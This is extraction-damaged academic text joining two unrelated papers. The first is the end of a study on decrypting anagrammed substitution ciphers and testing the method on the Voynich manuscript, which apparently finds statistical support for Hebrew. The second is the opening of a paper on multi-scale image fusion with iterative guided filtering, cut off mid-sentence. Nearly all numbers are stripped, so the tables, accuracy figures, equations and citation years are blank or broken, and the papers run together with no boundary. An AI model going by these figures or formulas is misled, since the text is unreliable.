sequences of anagrams containing only conso- nants. at test time, we remove the vowels from the input to the decipherment step of the pipeline. in contrast with knight et al. ( ), our approach is able not only to attack abjad ciphers, but also to re- store the vowels, producing fully readable text. . evaluation in order to test our anagram decryption pipeline on out-of-domain ciphertexts, the corpora for deriving language models need to be much larger than the udhr samples used in the previous section. we selected five diverse european languages from eu- roparl (koehn, ): english, bulgarian, german, greek, and spanish. the corresponding corpora contain about million words each, with the excep- tion of bulgarian which has only million words. we remove punctuation and numbers, and lowercase all text. we test on texts extracted from wikipedia articles on art, earth, europe, film, history, language, music, science, technology, and wikipedia. the texts are first enciphered using a substitution cipher, and then anagrammed (figure a-c). each of the five lan- guages is represented by ciphertexts, which are decrypted independently. in order to keep the run- ning time reasonable, the length of the ciphertexts is set to characters. the first step is language identification. our de- composition pattern method, which is resistant to both anagramming and substitution, correctly iden- tifies the source language of out of cipher- texts. the lone exception is the german article on technology, for which german is the second ranked language after greek. this error could be easily de- tected by noticing that most of the greek words “de- ciphered” by the subsequent steps are out of vocab- ulary. we proceed to evaluate the following steps assuming that the source language is known. step step both ceiling english . . . . bulgarian . . . . german . . . . greek . . . . spanish . . . . average . . . . table : word accuracy on the anagram decryption task. the results in table show that our system is able to effectively break the anagrammed ciphers in all five languages. for step (script decipherment), we count as correct all word tokens that contain the right characters, disregarding their order. step (ana- gram decoding) is evaluated under the assumption that it has received a perfect decipherment from step . on average, the accuracy of each individual step exceeds %. the values in the column denoted as both are the actual results of the pipeline composed of steps and . our system correctly recovers . % of word tokens, which corresponds to over % of the in-vocabulary words within the test files, the percentage of the in-vocabulary words, which are shown in the ceiling column, constitute the ef- fective accuracy limits for each language. the errors fall into three categories, as illustrated in figure e. step introduces decipherment errors (e.g., deciphering ‘s’ as ‘k’ instead of ‘z’ in “orga- nized”), which typically preclude the word from be- ing recovered in the next step. a decoding error in step may occur when an alphagram corresponds to multiple words (e.g. “greens” instead of “gen- res”), although most such ambiguities are resolved correctly. however, the majority of errors are caused by out-of-vocabulary (oov) words in the plaintext (e.g., “improvisational”). since the decoder can only produce words found in the training corpus, an oov word almost always results in an error. the german ciphers stand out as having the largest percentage of oov words ( . %), which may be attributed to fre- quent compounding. table shows the results of the analogous exper- iments on abjads (section . ). surprisingly, the removal of vowels from the plaintext actually im- proves the average decipherment step accuracy to %. this is due not only to the reduced number of step step both ceiling english . . . . bulgarian . . . . german . . . . greek . . . . spanish . . . . average . . . . table : word accuracy on the abjad anagram decryption task. distinct symbols, but also to the fewer possible ana- gramming permutations in the shortened words. on the other hand, the loss of vowel information makes the anagram decoding step much harder. however, more than three quarters of in-vocabulary tokens are still correctly recovered, including the original vow- els. in general, this is sufficient for a human reader to understand the meaning of the document, and de- duce the remaining words. voynich experiments in this section, we present the results of our experi- ments on the vms. we attempt to identify the source language with the methods described in section ; we quantify the similarity of the voynich words to alphagrams; and we apply our anagram decryption algorithm from section to the text. . data unless otherwise noted, the vms text used in our experiments corresponds to pages of the manuscript in the “type b” handwriting (vms-b), investigated by reddy and knight ( ), which we obtained directly from the authors. it con- tains , words and , characters, tran- scribed into characters of the currier alphabet (d’imperio, ). for the comparison experiments, we selected five languages shown in table , which have been suggested in the past as the language of the vms (kennedy and churchill, ). consider- ing the age of the manuscript, we attempt to use corpora that correspond to older versions of the languages, including king james bible, bibbia di gerusalemme, and vulgate. the differences in the ceiling numbers between tables and are due to words that are composed entirely of vowels. language text words characters english bible , , , italian bible , , , latin bible , , , hebrew tanach , , , arabic quran , , table : language corpora. . source language in this section, we present the results of our cipher- text language identification methods from section on the vms text. the closest language according to the letter fre- quency method is mazatec, a native american lan- guage from southern mexico. since the vms was created before the voyage of columbus, a new world language is an unlikely candidate. the top ten languages also include mozarabic ( ), italian ( ), and ladino ( ), all of which are plausible guesses. however, the experiments in section . demon- strate that the frequency analysis is much less reli- able than the other two methods. the top-ranking languages according to the de- composition pattern method are hebrew, malay (in arabic script), standard arabic, and amharic, in this order. we note that three of these belong to the semitic family. the similarity of decomposition patterns between hebrew and the vms is striking. the bhattacharyya distance between the respective distributions is . , compared to . for the second-ranking malay. the histogram in figure shows hebrew as a single outlier in the leftmost bin. in fact, hebrew is closer to a sample of the vms of a similar length than to any of the remaining udhr samples. the ranking produced by the the trial decipher- ment method is sensitive to parameter changes; how- ever, the two languages that consistently appear near the top of the list are hebrew and esperanto. the high rank of hebrew corroborates the outcome of the decomposition pattern method. being a relatively recent creation, esperanto itself can be excluded as the ciphertext language, but its high score is remark- able in view of the well-known theory that the vms text represents a constructed language. we hypoth- the theory was first presented in the form of an ana- figure : histogram of distances between the vms and samples of other languages, as determined by the de- composition pattern method. the single outlier on the left is hebrew. esize that the extreme morphological regularity of esperanto (e.g., all plural nouns contain the bigram ‘oj’) yields an unusual bigram character language model which fits the repetitive nature of the vms words. in summary, while there is no complete agree- ment between the three methods about the most likely underlying source language, there appears to be a strong statistical support for hebrew from the two most accurate methods, one of which is robust against anagramming. in addition, the language is a plausible candidate on historical grounds, being widely-used for writing in the middle ages. in fact, a number of cipher techniques, including anagram- ming, can be traced to the jewish cabala (kennedy and churchill, ). . alphagrams in this section, we quantify the peculiarity of the vms lexicon by modeling the words as alphagrams. we introduce the notion of the alphagram distance, and compute it for the vms and for natural language samples. we define a word’s alphagram distance with re- spect to an ordering of the alphabet as the number of letter pairs that are in the wrong order. for example, with respect to the qwerty keyboard order, the word rye has an alphagram distance of because it contains two letter pairs that violate the order: (r, e) and (y, e). a word is an alphagram if and only if its alphagram distance is zero. the maximum alpha- gram distance for a word of length n is equal to the number of its distinct letter pairs. gram (friedman and friedman, ). see also a more recent proposal by balandin and averyanov ( ). in order to quantify how strongly the words in a language resemble alphagrams, we first need to identify the order of the alphabet that minimizes the total alphagram distance of a representative text sample. the decision version of this problem is np- complete, which can be demonstrated by a reduc- tion from the path variant of the traveling salesman problem. instead, we find an approximate solution with the following greedy search algorithm. starting from an initial order in which the letters first occur in the text, we repeatedly consider all possible new positions for a letter within the current order, and choose the one that yields the lowest total alphagram distance of the text. this process is repeated until no better order is found for iterations, with ran- dom restarts. when applied to a random sample of , word tokens from the vms, our algorithm yields the or- der bzovpefsxqywc arutij *ghk mdln , which corresponds to the average alphagram dis- tance of . (i.e., slightly less than one pair of let- ters per word). the corresponding result on english is jzbqwxcpathofvurimslkengdy, with an average alphagram distance of . . note that the letters at the beginning of the sequence tend to have low frequency, while the ones at the end occur in popular morphological suffixes, such as −ed and −ly. for example, the beginning of the first arti- cle of the udhr with the letters transposed to fol- low this order becomes: “all ahumn biseng are born free and qaule in tiingdy and thrisg.” to estimate how close the solution produced by our greedy algorithm is to the actual optimal solu- tion, we also calculate a lower bound for the total alphagram distance with any character order. the lower bound is ∑ x,y min(bxy, byx), where bxy is the number of times character x occurs before character y within words in the text. figure shows the average alphagram distances for the vms and five comparison languages, each represented by a random sample of , word to- kens which exclude single-letter words. the ex- pected values correspond to a completely random intra-word letter order. the lexicographic values correspond to the standard alphabetic order in each language. the actual minimum alphagram distance is between the lower bound and the computed min- imum obtained by our greedy algorithm. figure : average word alphagram distances. the results in figure show that while the ex- pected alphagram distance for the vms falls within the range exhibited by natural languages, its mini- mum alphagram distance is exceptionally low. in absolute terms, the vms minimum is less than half the corresponding number for hebrew. in relative terms, the ratio of the expected distance to the min- imum distance is below for any of the five lan- guages, but above for the vms. these results sug- gest that, if the vms encodes a natural language text, the letters within the words may have been re- ordered during the encryption process. . decipherment experiments in this section, we discuss the results of applying our anagram decryption system described in section to the vms text. we decipher each of the first pages of the vms-b using the five language models derived from the corpora described in section . . the pages con- tain between and words, in total. fig- ure shows the average percentage of in-vocabulary words in the decipherments. the percentage is significantly higher for hebrew than for the other languages, which suggests a better match with the vms. although the abjad versions of english, ital- ian, and latin yield similar levels of in-vocabulary words, their distances to the vms language accord- ing to the decomposition pattern method are . , . , and . respectively, well above hebrew’s . . none of the decipherments appear to be syntac- tically correct or semantically consistent. this is expected because our system is designed for pure monoalphabetic substitution ciphers. if the vms indeed represents one of the five languages, the amount of noise inherent in the orthography and the transcription would prevent the system from pro- ducing a correct decipherment. for example, in a hypothetical non-standard orthography of hebrew, some prepositions or determiners could be written as separate one-letter words, or a single phoneme could have two different representations. in addi- tion, because of the age of the manuscript and the variety of its hand-writing styles, any transcription requires a great deal of guesswork regarding the separation of individual words into distinct symbols (figure ). finally, the decipherments necessarily reflect the corpora that underlie the language model, which may correspond to a different domain and his- torical period. nevertheless, it is interesting to take a closer look at specific examples of the system output. the first line of the vms (vas fae ar apam zoe zor qor for zoe ) is deciphered into hebrew as אנשיו עלי ו לביחו אליו איש nהכה לה ועשה .המצות according to a native speaker of the lan- guage, this is not quite a coherent sentence. how- ever, after making a couple of spelling corrections, google translate is able to convert it into passable english: “she made recommendations to the priest, man of the house and me and people.” even though the input ciphertext is certainly too noisy to result in a fluent output, the system might still manage to correctly decrypt individual words in a longer passage. in order to limit the influence of context in the decipherment, we restrict the word language model to unigrams, and apply our sys- tem to the first words ( characters) from the “herbal” section of the vms, which contains draw- ings of plants. an inspection of the output reveals several words that would not be out of place in a me- dieval herbal, such as הצר ‘narrow’, איכר ‘farmer’, אור ‘light’, אויר ‘air’, אׁש ‘fire’. the results presented in this section could be in- terpreted either as tantalizing clues for hebrew as hebrew is written from right to left. https://translate.google.com/ (accessed nov. , ). the length of the passage was chosen to match the number of symbols in the phaistos disc inscription. figure : average percentage of in-vocabulary words in the decipherments of the first ten pages of the vms. the source language of the vms, or simply as ar- tifacts of the combinatorial power of anagramming and language models. we note that the vms deci- pherment claims in the past have typically been lim- ited to short passages, without ever producing a full solution. in any case, the output of an algorithmic decipherment of a noisy input can only be a starting point for scholars that are well-versed in the given language and historical period. conclusion we have presented a multi-stage system for solv- ing ciphers that combine monoalphabetic letter sub- stitution and unconstrained intra-word letter trans- position to encode messages in an unknown lan- guage. we have evaluated three methods of cipher- text language identification that are based on letter frequency, decomposition patterns, and trial deci- pherment, respectively. we have demonstrated that our language-independent approach can effectively break anagrammed substitution ciphers, even when vowels are removed from the input. the application of our methods to the voynich manuscript suggests that it may represent hebrew, or another abjad script, with the letters rearranged to follow a fixed order. there are several possible directions for the future work. the pipeline approach presented in this pa- per might be outperformed by a unified generative model. the techniques could be made more resis- tant to noise; for example, by softening the emission model in the anagram decoding phase. it would also be interesting to jointly identify both the language and the type of the cipher (nuhn and knight, ), software at https://www.cs.ualberta.ca/˜kondrak/. which could lead to the development of methods to handle more complex ciphers. finally, the anagram decoding task could be extended to account for the transposition of words within lines, in addition to the transposition of symbols within words. acknowledgements we thank prof. moshe koppel for the assessment of the hebrew examples. we thank the reviewers for their comments and suggestions. this research was supported by the natural sci- ences and engineering research council of canada, and by alberta innovates – technology futures and alberta innovation & advanced education. references arcady balandin and sergey averyanov. . the voynich manuscript: new approaches to deciphering via a constructed logical language. a. bhattacharyya. . on a measure of divergence be- tween two statistical populations defined by their prob- ability distributions. bull. calcutta math. soc., : – . mary e. d’imperio. . the voynich manuscript: an elegant enigma. technical report, dtic document. guy emerson, liling tan, susanne fertmann, alexis palmer, and michaela regneri. . seedling: building and using a seed corpus for the human lan- guage project. in workshop on the use of computa- tional methods in the study of endangered languages, pages – . joseph martin feely. . roger bacon’s cypher. the right key found. rochester, ny. william f. friedman and elizebeth s. friedman. . acrostics, anagrams, and chaucer. philological quar- terly, ( ): – . bradley hauer, ryan hayward, and grzegorz kondrak. . solving substitution ciphers with combined lan- guage models. in coling, pages – . grzegorz jaskiewicz. . analysis of letter frequency distribution in the voynich manuscript. in interna- tional workshop on concurrency, specification and programming (cs&p’ ), pages – . frederick jelinek and robert l. mercer. . inter- polated estimation of markov source parameters from sparse data. pattern recognition in practice. gerry kennedy and rob churchill. . the voynich manuscript: the mysterious code that has defied inter- pretation for centuries. inner traditions/bear & co. kevin knight, anish nair, nishit rathod, and kenji ya- mada. . unsupervised analysis for decipherment problems. in coling/acl, pages – . kevin knight, beáta megyesi, and christiane schaefer. . the copiale cipher. in th workshop on build- ing and using comparable corpora: comparable corpora and the web, pages – . philipp koehn. . europarl: a parallel corpus for sta- tistical machine translation. in mt summit, volume , pages – . gabriel landini. . evidence of linguistic struc- ture in the voynich manuscript using spectral analysis. cryptologia, ( ): – . john matthews manly. . roger bacon and the voynich ms. speculum, ( ): – . marcelo a. montemurro and damián h. zanette. . keywords and co-occurrence patterns in the voynich manuscript: an information-theoretic analysis. plos one, ( ):e . george nagy, sharad seth, and kent einspahr. . decoding substitution ciphers by means of word matching with application to ocr. ieee transac- tions on pattern analysis and machine intelligence, ( ): – . william romaine newbold and roland grubb kent. . the cipher of roger bacon. university of pennsylvania press. peter norvig. . natural language corpus data. in toby segaran and jeff hammerbacher, editors, beau- tiful data: the stories behind elegant data solutions. o’reilly. malte nuhn and kevin knight. . cipher type detec- tion. in emnlp, pages – . sujith ravi and kevin knight. . attacking deci- pherment problems optimally with low-order n-gram models. in emnlp, pages – . sujith ravi and kevin knight. . learning phoneme mappings for transliteration without parallel data. in naacl, pages – . sravana reddy and kevin knight. . what we know about the voynich manuscript. in th acl-hlt work- shop on language technology for cultural heritage, social sciences, and humanities, pages – . andrew robinson. . lost languages: the enigma of the world’s undeciphered scripts. mcgraw-hill. gordon rugg. . an elegant hoax? a possible solution to the voynich manuscript. cryptologia, ( ): – . andreas schinner. . the voynich manuscript: evi- dence of the hoax hypothesis. cryptologia, ( ): – . klaus schmeh. . a milestone in voyn- ich manuscript research: voynich conference in monte porzio catone, italy. cryptologia, ( ): – . simon singh. . the code book: the science of secrecy from ancient egypt to quantum cryptography. anchor. leonell c strong. . anthony askham, the author of the voynich manuscript. science, ( ): – . john tiltman. . the voynich manuscript, the most mysterious manuscript in the world. baltimore bib- liophiles. submitted june accepted july published august corresponding author alexander toet, lextoet@gmail.com academic editor klara kedem additional information and declarations can be found on page doi . /peerj-cs. copyright toet distributed under creative commons cc-by . open access iterative guided image fusion alexander toet tno soesterberg, netherlands abstract we propose a multi-scale image fusion scheme based on guided filtering. guided filtering can effectively reduce noise while preserving detail boundaries. when applied in an iterative mode, guided filtering selectively eliminates small scale details while restoring larger scale edges. the proposed multi-scale image fusion scheme achieves spatial consistency by using guided filtering both at the decomposition and at the recombination stage of the multi-scale fusion process. first, size-selective iterative guided filtering is applied to decompose the source images into approximation and residual layers at multiple spatial scales. then, frequency-tuned filtering is used to compute saliency maps at successive spatial scales. next, at each spatial scale binary weighting maps are obtained as the pixelwise maximum of corresponding source saliency maps. guided filtering of the binary weighting maps with their corresponding source images as guidance images serves to reduce noise and to restore spatial consistency. the final fused image is obtained as the weighted recombination of the individual residual layers and the mean of the approximation layers at the coarsest spatial scale. application to multiband visual (intensified) and thermal infrared imagery demonstrates that the proposed method obtains state-of-the-art performance for the fusion of multispectral nightvision images. the method has a simple implementation and is computationally efficient. subjects computer vision keywords image fusion, guided filter, saliency, infrared, nightvision, thermal imagery, intensified imagery introduction the increasing deployment and availability of co-registered multimodal imagery from different types of sensors has spurred the development of image fusion techniques. the information provided by different sensors registering the same scene can either be (partially) redundant or complementary and may be corrupted with noise. effective combinations of complementary and partially redundant multispectral imagery can therefore visualize information that is not directly evident from the individual input images. for instance, in nighttime (low-light) outdoor surveillance applications, intensified visual (ii) or near- infrared (nir) imagery often provides a detailed but noisy representation of a scene. while different types of noise may result from several processes associated with the underlying sensor physics, additive noise is typically the predominant noise component encountered in ii and nir imagery (petrovic & xydeas, ). additive noise can be modelled as a random signal that is simply added to the original signal. as a result, additive noise may obscure or distort relevant image details. in addition, targets of interest like persons or cars how to cite this article toet ( ), iterative guided image fusion. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:lextoet@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. are sometimes hard to distinguish in ii or nir imagery because of their low luminance contrast. while thermal infrared (ir) imagery typically represents these targets with high contrast, their background (context) is often washed out due to low thermal contrast. in this case, a fused image that clearly represents both the targets and their background enables a user to assess the location of targets relative to landmarks in their surroundings, thus providing more information than either of the input images alone. some potential benefits of image fusion are: wider spatial and temporal coverage, decreased uncertainty, improved reliability, and increased system robustness. image fusion has important applications in defense and security for situational awareness (toet et al., ), surveillance (shah et al., ; zhu & huang, ), target tracking (motamed, lherbier & hamad, ; zou & bhanu, ), intelligence gathering (o’brien & irvine, ), concealed weapon detection (bhatnagar & wu, ; liu et al., ; toet, ; xue & blum, ; xue, blum & li, ; yajie & mowu, ), detection of abandoned packages (beyan, yigit & temizel, ) and buried explosives (lepley & averill, ), and face recognition (kong et al., ; singh, vatsa & noore, ). other important image fusion applications are found in industry (tian et al., ), art analysis (zitová, beneš & blažek, ), agriculture (bulanona, burks & alchanatis, ), remote sensing (ghassemian, ; jacobson & gupta, ; jacobson, gupta & cole, ; jiang et al., ) and medicine (agarwal & bedi, ; biswas, chakrabarti & dey, ; daneshvar & ghassemian, ; singh & khare, ; wang, li & tian, ; yang & liu, ) (for a survey of different applications of image fusion techniques see blum & liu ( ). in general, image fusion aims to represent the visual information from any number of input images in a single composite (fused) image that is more informative than each of the input images alone, eliminating noise in the process while preventing both the loss of essential information and the introduction of artefacts. this requires the availability of filters that combine the extraction of relevant image details with noise reduction. to date, a variety of image fusion algorithms have been proposed. a popular class of algorithms are the multi-scale image fusion schemes, which decompose the source images into spatial primitives at multiple spatial scales, then integrate these primitives to form a new (‘fused’) multi-scale representation, and finally apply an inverse multi-scale transform to reconstruct the fused image. examples of this approach are for instance the laplacian pyramid (burt & adelson, ), the ratio of low-pass pyramid (toet, b), the contrast pyramid (toet, van ruyven & valeton, ), the filter-subtract-decimate laplacian pyramid (burt, ; burt & kolczynski, ), the gradient pyramid (burt, ; burt & kolczynski, ), the morphological pyramid (toet, a), the discrete wavelet transform (lemeshewsky, ; li, manjunath & mitra, ; li, kwok & wang, ; scheunders & de backer, ), the shift invariant discrete wavelet transform (lemeshewsky, ; rockinger, ; rockinger, ; rockinger & fechner, ), the contourlet (yang et al., ), the shift-invariant shearlet transform (wang, li & tian, ), the non- subsampled shearlet transform (kong, wang & lei, ; liu et al., ; zhang et al., ), the ridgelet transform (tao, junping & ye, ). the filters applied in several of the earlier techniques typically produce halo artefacts near edges. more recent methods like toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. shearlets, contourlets and ridgelets are better capable to preserve local image features but are often complex or time-consuming. non-linear edge-preserving smoothing filters such as anisotropic diffusion (perona & malik, ), robust smoothing (black et al., ) and the bilateral filter (tomasi & manduchi, ) may appear effective tools to prevent artefacts that arise from spatial inconsistencies in multi-scale image fusion schemes. however, anisotropic diffusion tends to over-sharpen edges and is computationally expensive, which makes it less suitable for application in multi-scale fusion schemes (farbman et al., ). the non-linear bilateral filter (blf) assigns each pixel a weighted mean of its neighbors, with the weights decreasing both with spatial distance and with difference in value (tomasi & manduchi, ). while the blf is quite effective at smoothing small intensity changes while preserving strong edges and has efficient implementations, it also tends to blur across edges at larger spatial scales, thereby limiting its value for application in multi-scale image decomposition schemes (farbman et al., ). in addition, the blf has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood: he, sun & tang, ). in the joint (or cross) bilateral filter (jblf) a second or guidance image serves to steer the edge stopping range filter thus preventing over- or under- blur near edges (petschnigg et al., ). zhang et al. ( ) showed that the application of the jblf in an iterative framework results in size selective filtering of small scale details combined with the recovery of larger scale edges. the recently introduced guided filter (gf: he, sun & tang, ) is a computationally efficient, edge-preserving translation-variant operator based on a local linear model which avoids the drawbacks of bilateral filtering and other previous approaches. when the input image also serves as the guidance image, the gf behaves like the edge preserving blf. hence, the gf can gracefully eliminate small details while recovering larger scale edges when applied in an iterative framework. in this paper we propose a multi-scale image fusion scheme, where iterative guided filtering is used to decompose the input images into approximate and residual layers at successive spatial scales, and guided filtering is used to construct the weight maps used in the recombination process. the rest of this paper is organized as follows. ‘edge preserving filtering’ briefly discusses the principles of edge preserving filtering and introduces (iterative) guided filtering. in ‘related work’ we discuss related work. ‘proposed method’ presents the proposed guided fusion based image fusion scheme. ‘methods and material’ presents the imagery and computational methods that were used to assess the performance of the new image fusion scheme. the results of the evaluation study are presented in ‘results.’ finally, in ‘discussion and conclusions’ the results are discussed and some conclusions are presented. edge preserving filtering in this section we briefly introduce the edge preserving bilateral and joint bilateral filters, show how they are related to the guided filter, and how the application of a guided filter in an iterative framework results in size selective filtering of small scale image details combined with the recovery of larger scale edges. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. bilateral filter spatial filtering is a common operation in image processing that is typically used to reduce noise or eliminate small spurious details (e.g., texture). in spatial filtering the value of the filtered image at a given location is a function (e.g., a weighted average) of the original pixel values in a small neighborhood of the same location. although low pass filtering or blurring (e.g., averaging with gaussian kernel) can effectively reduce image noise, it also seriously degrades the articulation of (blurs) significant image edges. therefore, edge preserving filters have been developed that reduce small image variations (noise or texture) while preserving large discontinuities (edges). the bilateral filter is a non-linear filter that computes the output at each pixel as a gaussian weighted average of their spatial and spectral distances. it prevents blurring across edges by assigning larger weights to pixels that are spatially close and have similar intensity values (tomasi & manduchi, ). it uses a combination of (typically gaussian) spatial and a range (intensity) filter kernels that perform a blurring in the spatial domain weighted by the local variation in the intensity domain. it combines a classic low-pass filter with an edge-stopping function that attenuates the filter kernel weights at locations where the intensity difference between pixels is large. bilateral filtering was developed as a fast alternative to the computationally expensive technique of anisotropic diffusion, which uses gradients of the filtering images itself to guide a diffusion process, avoiding edge blurring (perona & malik, ). more formally, at a given image location (pixel) i, the filtered output oi is given by: oi= ki ∑ j∈� ij f (‖i−j‖) g(‖ii−ij‖) ( ) where f is the spatial filter kernel (e.g., a gaussian centered at i), g is the range or intensity (edge-stopping) filter kernel (centered at the image value at i), � is the spatial support of the kernel, and ki is a normalizing factor (the sum of the f · g filter weights). intensity edges are preserved since the bilateral filter decreases not only with the spatial distance but also with the intensity distance. though the filter is efficient and effectively reduces noise while preserving edges in many situations, it has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood: he, sun & tang, ). in the joint (or cross) bilateral filter (jblf) the range filter is applied to a second or guidance image g (petschnigg et al., ): oi= ki ∑ j∈� ij ·f (‖i−j‖)·g(‖gi−gj‖). ( ) the jblf can prevent over- or under- blur near edges by using a related image g to guide the edge stopping behavior of the range filter. that is, the jblf smooths the image i while preserving edges that are also represented in the image g. the jblf is particularly favored when the edges in the image that is to be filtered are unreliable (e.g., due to noise toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. or distortions) and when a companion image with well-defined edges is available (e.g., in the case of flash /no-flash image pairs). thus, in the case of filtering an ii image for which a companion (registered) ir image is available, the guidance image may either be the ii image itself or its ir counterpart. guided filtering a guided image filter (he, sun & tang, ) is a translation-variant filter based on a local linear model. guided image filtering involves an input image i, a guidance image g) and an output image o. the two filtering conditions are (i) that the local filter output is a linear transform of the guidance image g and (ii) as similar as possible to the input image i. the first condition implies that oi=akgi+bk ∀i∈ωk ( ) where ωk is a square window of size ( r+ )×( r+ ). the local linear model ensures that the output image o has an edge only at locations where the guidance image g has one, because ∇o=a∇g. the linear coefficients ak and bk are constant in ωk. they can be estimated by minimizing the squared difference between the output image o and the input image i (the second filtering condition) in the window ωk, i.e., by minimizing the cost function e: e(ak,bk)= ∑ i∈ωk ( (akgi+bk−ii) +εa k ) ( ) where ε is a regularization parameter penalizing large ak. the coefficients ak and bk can directly be solved by linear regression (he, sun & tang, ): ak = |ω| ∑ i∈ωk giii−gkik σ k +ε ( ) bk = ik−akgk ( ) where |ω| is the number of pixels in ωk, ik and gk represent the means of respectively i and g over ωk, and σ k is the variance of i over ωk. since pixel i is contained in several different (overlapping) windows ωk, the value of oi in eq. ( ) depends on the window over which it is calculated. this can be accounted for by averaging over all possible values of oi: oi= |ω| ∑ k|i∈ωk (akgk+bk). ( ) since ∑ k|i∈ωk ak = ∑ k∈ωiak due to the symmetry of the box window eq. ( ) can be written as oi=aigi+bi ( ) where ai = |ω| ∑ k∈ωiak and bi = |ω| ∑ k∈ωibk are the average coefficients of all windows overlapping i. although the linear coefficients (ai,bi) vary spatially, their gradients will be toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. smaller than those of g near strong edges (since they are the output of a mean filter). as a result we have ∇o≈a∇g, meaning that abrupt intensity changes in the guiding image g are still largely preserved in the output image o. equations ( ), ( ) and ( ) define the guided filter. when the input image also serves as the guidance image, the guided filter behaves like the edge preserving bilateral filter, with the parameters ε and the window size r having the same effects as respectively the range and the spatial variances of the bilateral filter. equations ( ) can be rewritten as oi= ∑ j wij(g)ij ( ) with the weighting kernel wij depending only on the guidance image g: wij = |ω| ∑ k:(i,j)∈ωk ( + (gi−gk)(gj−gk) σ k +ε ) . ( ) since ∑ jwij(g)= this kernel is already normalized. the guided filter is a computationally efficient, edge-preserving operator which avoids the gradient reversal artefacts of the bilateral filter. the local linear condition formulated by eq. ( ) implies that its output is locally approximately a scaled version of the guidance image plus an offset. this makes it possible to use the guided filter to transfer structure from the guidance image g to the output image o, even in areas where the input image i is smooth (or flat). this structure- transferring filtering is an useful property of the guided filter, and can for instance be applied for feathering/matting and dehazing (he, sun & tang, ). iterative guided filtering zhang et al. ( ) showed that the application of the joint bilateral filter (eq. ( )) in an iterative framework results in size selective filtering of small scale details combined with the recovery of larger scale edges. in this scheme the result gt+ of the tth iteration is obtained from the joint bilateral filtering of the input image i using the result gt of the previous iteration step as the guidance image: gt+ i = ki ∑ j∈� ij ·f (‖i−j‖)·g(‖g t i −g t j‖). ( ) in this scheme, details smaller than the gaussian kernel of the bilateral filter are removed while the edges of the remaining details are iteratively restored. hence, this scheme allows the selective elimination of small scale details while preserving the remaining image structure. note that the initial guidance image g can simply be a constant (e.g., zero) valued image since it updates to the gaussian filtered input image in the first iteration step. here we propose to replace the bilateral filter in this scheme by a guided filter to avoid any gradient reversal artefacts. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. related work as mentioned before, most multi-scale transform-based image fusion methods introduce some artefacts because the spatial consistency is not well-preserved (li, kang & hu, ). this has led to the use of edge preserving filters to decompose source images into approximate and residual layers while preserving the edge information in the fusion process. techniques that have been applied include weighted least squares filter (yong & minghui, ), l fidelity using l gradient (cui et al., ), l gradient minimization (zhao et al., ), cross bilateral filter (kumar, ) and anisotropic diffusion (bavirisetti & dhuli, a). li, kang & hu ( ) proposed to restore spatial consistency by using guided filtering in the weighted recombination stage of the fusion process. in their scheme, the input images are first decomposed into approximate and residual layers using a simple averaging filter. next, each input image is then filtered with a laplacian kernel followed by blurring with a gaussian kernel, and the absolute value of the result is adopted as a saliency map that characterizes the local distinctness of the input image details. then, binary weight maps are obtained by comparing the saliency maps of all input images, and assigning a pixel in an individual weight map the value if it is the pixelwise maximum of all saliency maps, and otherwise. the resulting binary weight maps are typically noisy and not aligned with object boundaries and may produce artefacts to the fused image. li, kang & hu ( ) performed guided filtering on each weight map with its corresponding source layer as the guidance image, to reduce noise and to restore spatial consistency. the gf guarantees that pixels with similar intensity values have similar weights and weighting is not performed across edges. typically a large filter size and a large blur degree are used to fuse the approximation layers, while a small filter size and a small blur degree are used to combine the residual layers. finally, the fused image is obtained by weighted recombination of the individual source residual layers. despite the fact that this method is efficient and can achieve state-of-the-art performance in most cases, it does not use edge preserving filtering in the decomposition stage and applies a saliency map that does not relate well to human visual saliency (gan et al., ). in their multi-scale image fusion framework gan et al. ( ) apply edge preserving filtering in the decomposition stage to extract well-defined image details (i.e., to preserve their edges) and use guided filtering in the weighted recombination stage to reduce spatial inconsistencies introduced by the weighting maps used in the reconstruction stage (i.e., to prevent edge artefacts like halos). first, a nonlinear weighted least squares edge-preserving filter (farbman et al., ) is used to decompose the source images into approximate and residual layers. next, phase congruency is used to calculate saliency maps that characterize the local distinctness of the source image details. the rest of their scheme is similar to that of li, kang & hu ( ): binary weight maps are obtained from pixelwise comparison of the saliency maps corresponding to the individual source images; guided filtering is applied to these binary weight maps to recue noise and restore spatial consistency, and the fused image is obtained by weighted recombination of the individual source residual layers. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flow chart of the proposed image fusion scheme. the processing scheme is illustrated for two source images x and y and resolution levels ( – ). x and y are the original input images, while xi and yi represent successively lower resolution versions obtained by iterative guided filtering. ‘saliency’ repre- sents the frequency-tuned saliency transformation, ‘max’ and ‘mean’ respectively denote the pointwise maximum and mean operators, ‘(i)gf’ means (iterative) guided filtering, ‘dx,’ ‘dy ’ and ‘df’ are respec- tively the original and fused detail layers, ‘bw ’ the binary weight maps, and ‘w ’ the smooth weight maps. proposed method a flow chart of the proposed multi-scale decomposition fusion scheme is shown in fig. . the algorithm consists of the following steps: . iterative guided filtering is applied to decompose the source images into approximate layers (representing large scale variations) and residual layers (containing small scale variations). . frequency-tuned filtering (achanta et al., ) is used to generate saliency maps for the source images. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . binary weighting maps are computed as the pixelwise maximum of the individual source saliency maps. . guided filtering is applied to each binary weighting map with its corresponding source as the guidance image to reduce noise and to restore spatial consistency. . the fused image is computed as a weighted recombination of the individual source residual layers. in a hierarchical framework steps – are performed at multiple spatial scales. in this paper we used a level decomposition obtained by filtering at three different spatial scales (see fig. ). figure shows the intensified visual (ii) and thermal infrared (ir) or near infrared (nir) 